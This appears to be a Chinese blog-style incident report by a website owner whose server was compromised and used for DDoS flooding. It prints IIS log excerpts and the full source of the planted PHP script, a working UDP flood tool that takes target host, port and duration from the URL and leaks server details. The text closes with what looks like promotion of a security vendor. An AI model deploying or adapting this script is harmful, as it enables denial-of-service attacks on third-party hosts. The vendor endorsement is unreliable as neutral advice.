> 网络安全 > 云安全 >

网站服务器向外发包的解决办法

   我的windows2003网站服务器,前几天一直都非常的稳定,可是昨天服务器商竟然说我服务器向外发包,流量特别的大,导致机房的整个网络及其不稳定,暂停了我的服务器,导致我的小说站,流量一直的下滑,收入也没有了,欲哭无泪啊。
 

        跟机房那面技术也交谈了好久,才告诉我实情,是因为我服务器上的一个小说网站对外发包才导致服务器被机房封掉,技术建议我查看下网站的iis日志,机房暂时把我的80端口封了,远程还是可以进的,进服务器看了昨天的iis日志,发现了许多不同的post日志,代码如下:


221.7.233.92 - - [17/Aug/2012:10:44:28 +0800] "GET /phzLtoxn.php?host=64.32.26.114&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:28 +0800] "GET /phzLtoxn.php?host=175.41.24.106&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:32 +0800] "GET /phzLtoxn.php?host=121.10.107.53&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:32 +0800] "GET /phzLtoxn.php?host=108.162.203.74&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:33 +0800] "GET /phzLtoxn.php?host=69.197.24.66&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:39 +0800] "GET /phzLtoxn.php?host=220.250.64.18&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:50 +0800] "GET /phzLtoxn.php?host=118.123.229.13&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
221.7.233.92 - - [17/Aug/2012:10:44:58 +0800] "GET /phzLtoxn.php?host=174.34.155.187&port=80&time=60 HTTP/1.1" 200 1654 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"
66.249.66.214 - - [17/Aug/2012:10:45:07 +0800] "GET /department/bibing/bichuxue/20120531/311.html HTTP/1.1" 200 45769 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" xh029.com text/html "/usr/home/hmu112047/htdocs/index.php"


我也不太懂这样的日志,就找了几个做网站方面的朋友,帮我分析了一下,说是网站下的phzLtoxn.php文件在向外发包,其中host就是流量对外发包的ip,Post是端口,time是时间,上面的日志中很明显的发现我的网站流量,在向其他服务器的80端口发送流量,朋友说这种攻击叫流量攻击,也叫DDOS。  说白了,也就是人家的肉鸡。

大体的情况了解了,解决就有了办法,既然是phzLtoxn.php这个文件在搞怪。那就超phzLtoxn.php这个文件开炮。进服务器打开网站根目录,找了这个文件,打开后发现里面的代码都是攻击性的代码,代码如下:


<?php

set_time_limit(999999);

$host = $_GET['host'];

$port = $_GET['port'];

$exec_time = $_GET['time'];

$Sendlen = 65535;

$packets = 0;

ignore_user_abort(True);

if (StrLen($host)==0 or StrLen($port)==0 or StrLen($exec_time)==0){

        if (StrLen($_GET['rat'])<>0){

                echo $_GET['rat'].$_SERVER["HTTP_HOST"]."|".GetHostByName($_SERVER['SERVER_NAME'])."|".php_uname()."|".$_SERVER['SERVER_SOFTWARE'].$_GET['rat'];

                exit;

            }

        echo "Warning to: opening";

        exit;

    }

for($i=0;$i<$Sendlen;$i++){

        $out .= "A";

    }

$max_time = time()+$exec_time;

while(1){

    $packets++;

    if(time() > $max_time){

        break;

    }

    $fp = fsockopen("udp://$host", $port, $errno, $errstr, 5);

        if($fp){

            fwrite($fp, $out);

            fclose($fp);

    }

}

echo "Send Host:$hostport<br><br>";

echo "Send Flow:$packets * ($Sendlen/1024=" . round($Sendlen/1024, 2) . ")kb / 1024 = " . round($packets*$Sendlen/1024/1024, 2) . " mb<br><br>";

echo "Send Rate:" . round($packets/$exec_time, 2) . " packs/s;" . round($packets/$exec_time*$Sendlen/1024/1024, 2) . " mb/s";

?>  


用360扫描了一下,发现这个文件是脚本木马。我这才明白过来,原来我的网站是被人上传了木马,也就是说网站被人入侵了。在网上找了点文章了解到,网站被上传木马大多数是因为网站程序有漏洞,和服务器安全有关系的。
 

于是在网上搜索到了一个叫sinesafe网站木马检测的工具,把网站的源程序放到了工具里扫描,发现了有5个脚本木马,都是高危型的木马,点了一下清除,木马统统被杀。本地调试打开网站,网站一切正常了。  通知了机房,服务器正常开通。

本以为可以好好睡一觉了,没想到半夜的时候来了监控宝的短信,说我的网站暂时无法访问。当时我真的头大了,我明明把木马清除了,怎么还出现问题啊。  用sinesafe木马工具又扫描了一下,发现又出来了2个木马,当我点击删除的时候,我也明白了,木马删来删去的,问题还是会存在,最主要的是要把网站被上传木马的这个根本原因,解决掉,才能真正的解决问题。
 

分析了一下,一个是我网站用的是dedecms的系统,再一个就是服务器的安全问题,前几天发现了服务器不太正常。W3wp.exe这个进程占用了%75的内存。网站打开也非常的缓慢。Ping的时候时不时的丢包,肯定是服务器也出现问题,可是对于服务器安全我也不懂,看着网站流量一天一天的下滑,损失真的太大了,我这几年的努力啊。没办法咨询了几个资深小说行业的朋友,问有没有解决的办法,他们建议我找一家专业做安全方面的公司。 他们也都是这样解决的,最快的解决办法,也是把损失降到最低的办法。他们也一致推荐了sinesafe这家安全公司。找了他们,做了网站安全和服务器安全,以及代码的审计,漏洞修补,问题才得以解决,网站也恢复了正常,监视了几天也没在发生网站向外发包的特征,服务器也很正常了。
 

写了这么多,最主要的还是经历的过程。在解决问题的过程中,也明白了许多的道理,安全这个问题不能小看了,出了一点点安全问题,得到的损失也将会很大,也由衷的希望我的经历能帮到更多需要帮助的人,帮助别人也是在帮助我自己。

 

(责任编辑:IT)